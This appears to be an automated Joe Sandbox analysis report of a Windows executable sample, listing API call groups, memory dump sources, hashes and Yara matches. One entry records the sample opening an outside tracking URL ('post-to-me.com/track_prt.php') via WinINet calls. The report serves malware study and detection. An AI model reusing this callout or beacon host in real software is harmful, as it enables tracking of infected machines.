                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                        • String ID:
                                                                                                        • API String ID: 4266703842-0
                                                                                                        • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                        • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                        • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                        • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                        APIs
                                                                                                          • Part of subcall function 02132994: TlsGetValue.KERNEL32(?,?,02130DB2,02132EBF,00000000,?,02130D90,?,?,?,00000000,?,00000000), ref: 0213299A
                                                                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02137BA1
                                                                                                          • Part of subcall function 0214120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02141231
                                                                                                          • Part of subcall function 0214120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0214124A
                                                                                                          • Part of subcall function 0214120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021412C0
                                                                                                          • Part of subcall function 0214120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021412C8
                                                                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02137BAF
                                                                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02137BB9
                                                                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02137BC3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02137BE1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                        • String ID:
                                                                                                        • API String ID: 4266703842-0
                                                                                                        • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                        • Instruction ID: 81f5b7a90f5dcd9779745096493a7652c39486e04e9762d55e2089b35a72ce17
                                                                                                        • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                        • Instruction Fuzzy Hash: A0F02471A802186FCF27B7B598109AEFB7B9F80B24B00412AD81593290EF359E468FC1
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00439E4D
                                                                                                          • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                          • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                        • _free.LIBCMT ref: 00439E5F
                                                                                                        • _free.LIBCMT ref: 00439E71
                                                                                                        • _free.LIBCMT ref: 00439E83
                                                                                                        • _free.LIBCMT ref: 00439E95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                        • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                        • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0215A0B4
                                                                                                          • Part of subcall function 021536C1: HeapFree.KERNEL32(00000000,00000000,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?), ref: 021536D7
                                                                                                          • Part of subcall function 021536C1: GetLastError.KERNEL32(?,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?,?), ref: 021536E9
                                                                                                        • _free.LIBCMT ref: 0215A0C6
                                                                                                        • _free.LIBCMT ref: 0215A0D8
                                                                                                        • _free.LIBCMT ref: 0215A0EA
                                                                                                        • _free.LIBCMT ref: 0215A0FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                        • Instruction ID: 8f61c621eb6fe4d4cbefbb321ecd55c0e43aa26f12c658b85afab5dd8f1ea51b
                                                                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                        • Instruction Fuzzy Hash: 3EF012329C5324EB8720EB54F9C2C1A77DABE047557640AD9F878DB721CB31F8908A99
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00431738
                                                                                                          • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                          • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                        • _free.LIBCMT ref: 0043174A
                                                                                                        • _free.LIBCMT ref: 0043175D
                                                                                                        • _free.LIBCMT ref: 0043176E
                                                                                                        • _free.LIBCMT ref: 0043177F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                        • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                        • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                        • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2583373041-0
                                                                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                        • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                        • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0215199F
                                                                                                          • Part of subcall function 021536C1: HeapFree.KERNEL32(00000000,00000000,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?), ref: 021536D7
                                                                                                          • Part of subcall function 021536C1: GetLastError.KERNEL32(?,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?,?), ref: 021536E9
                                                                                                        • _free.LIBCMT ref: 021519B1
                                                                                                        • _free.LIBCMT ref: 021519C4
                                                                                                        • _free.LIBCMT ref: 021519D5
                                                                                                        • _free.LIBCMT ref: 021519E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                        • Instruction ID: fab1f5477795bfcac7e510bfe847fe7221f2c5b9542d352106ddd435c53adf17
                                                                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                        • Instruction Fuzzy Hash: FDF0A971C40324EA9F216F14FC804047BA1AF1976271112EAF82697272C7359966DFDE
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0213CF26
                                                                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0213CF57
                                                                                                        • GetCurrentThread.KERNEL32 ref: 0213CF60
                                                                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0213CF73
                                                                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0213CF7C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2583373041-0
                                                                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                        • Instruction ID: a35cc4cc9e928b3e9b8f351007b4096ba385c5a4940949d4475d733ddb356716
                                                                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                        • Instruction Fuzzy Hash: 09F082362809009FCA2BFF61F5508BB77BB9FC4610300455DD49646550CF21A906DBA1
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02122E84
                                                                                                          • Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121328
                                                                                                          • Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121344
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02123097
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen_wcslen
                                                                                                        • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                        • API String ID: 3381584094-4083784958
                                                                                                        • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                        • Instruction ID: ee2ec56ae919769078b5eb93b5522b9738ffd6ff449ff205adad8ce3e622b443
                                                                                                        • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                        • Instruction Fuzzy Hash: 35515195A65344A9E320EFB0BC55B3633B8FF58712F10543AE528CB2B2E7B19944871E
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: BC$BC
                                                                                                        • API String ID: 885266447-2490606219
                                                                                                        • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                        • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                        • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                        • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DLKs2Qeljg.exe,00000104), ref: 0042F743
                                                                                                        • _free.LIBCMT ref: 0042F80E
                                                                                                        • _free.LIBCMT ref: 0042F818
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                        • API String ID: 2506810119-3474929440
                                                                                                        • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                        • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                        • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                        • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DLKs2Qeljg.exe,00000104), ref: 0214F9AA
                                                                                                        • _free.LIBCMT ref: 0214FA75
                                                                                                        • _free.LIBCMT ref: 0214FA7F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                        • API String ID: 2506810119-3474929440
                                                                                                        • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                        • Instruction ID: 79556ebabb0fc5fc6039727af75ddc91d13394041a67cae4e9a34f58301f7eeb
                                                                                                        • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                        • Instruction Fuzzy Hash: 1A318571A80258EFDB25DF99DC84D9EBBFDEF89710B1040A7E80997321DB709A41CB50
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0212C8D4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                        • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                        • Instruction ID: 59df050293d2fd68704757a09d63c38fe70c17e64d09e9dda0e050022d35e647
                                                                                                        • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                        • Instruction Fuzzy Hash: 18F02B73C806286ECB08E954CD01BEE33985B01305F06C077FF556A182EB68991DCBD4
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                        • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                        • String ID: <(@
                                                                                                        • API String ID: 3213686812-4189137628
                                                                                                        • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                        • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                        • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                        • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                        APIs
                                                                                                          • Part of subcall function 004394FD: GetEnvironmentStringsW.KERNEL32 ref: 00439501
                                                                                                        • _free.LIBCMT ref: 0042FA4F
                                                                                                        • _free.LIBCMT ref: 0042FA56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentStrings
                                                                                                        • String ID: 0TX$0TX
                                                                                                        • API String ID: 3523873077-439298216
                                                                                                        • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                        • Instruction ID: 08707e55e404d2c76e2f6eae856c7126cd4318a61dcb705a42d68a92314f0541
                                                                                                        • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                        • Instruction Fuzzy Hash: 0EE0ED12F0592142E632B63B3C02A6A06144B8177EFD0423FE828D61C2DE6C880B029F
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                        • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                        • String ID: <(@
                                                                                                        • API String ID: 3213686812-4189137628
                                                                                                        • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                        • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                        • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                        • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler
                                                                                                        • API String ID: 1381464787-923244539
                                                                                                        • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                        • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                                                        • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                        • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                                                        APIs
                                                                                                        • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pContext
                                                                                                        • API String ID: 1990795212-2046700901
                                                                                                        • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                        • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                                                        • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                        • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler$version
                                                                                                        • API String ID: 1687795959-3154422776
                                                                                                        • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                        • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                                                        • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                        • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                        • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                                                        • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                        • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                        • Instruction ID: 916a6bb406fa5a8f375fd7065e5ae98e38a7afe7f1d35a8038d0c33ea0654eb1
                                                                                                        • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                        • Instruction Fuzzy Hash: 5AA145729807AAEFDB25CF18C8947AEBBA7EF41310F5441EDD9B59B241C3398941CB50
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
